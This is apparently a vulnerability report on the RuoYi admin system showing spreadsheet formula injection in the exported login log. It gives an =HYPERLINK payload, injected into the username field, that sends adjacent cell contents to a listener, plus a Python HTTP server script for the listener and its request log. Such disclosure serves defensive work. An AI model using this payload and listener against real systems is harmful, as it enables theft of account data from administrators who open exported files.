CSV Injection Vulnerability

The product has the CSV injection vulnerability. For example, the CSV injection vulnerability is used to obtain login accounts.

1.
When a user logs in, in the request of "/login", change the value of `username` to `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")` by burpsuite tool.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/230415_19658e36_10313790.jpeg "1.jpg")
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231108_af9f47fc_10313790.jpeg "2.jpg")
2.
Run the python script to start the HTTP service with port 8007.
```
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'this is a test'}
# You can change  **localhost**  to the IP address of the hacker's computer.
host = ('localhost', 8007)

class Resquest(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())

if __name__ == '__main__':
    server = HTTPServer(host, Resquest)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()
```

3.
Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view logs, and exporting `.xlsx` log file.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/230718_9e200e2e_10313790.png "3.png")

4.
Open `.xlsx` log file, double-click the cell of `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")`. Then click an empty cell. And then click the cell of `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")`. In this case, a request is sent to the `localhost:8007`.
The contents of cells `B2` and `B3` are `admin` and `test1`.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231136_63c8855a_10313790.png "4.png")
Before double-click.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231147_f64eb0ea_10313790.png "5.png")
After double-click. And then click `E`.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231209_af0688d0_10313790.png "6.png")
A request is sent to the `localhost:8007` through the browser.
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231236_415cc641_10313790.png "7.png")
5.
The HTTP service with port 8007 receives the following information:
`127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -`
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/231318_8501e41a_10313790.jpeg "9.jpg")

So, we get user"admin"/"test1"/...

GVP 若依/RuoYi

内容风险标识

评论 (1)

GVP若依/RuoYi

内容风险标识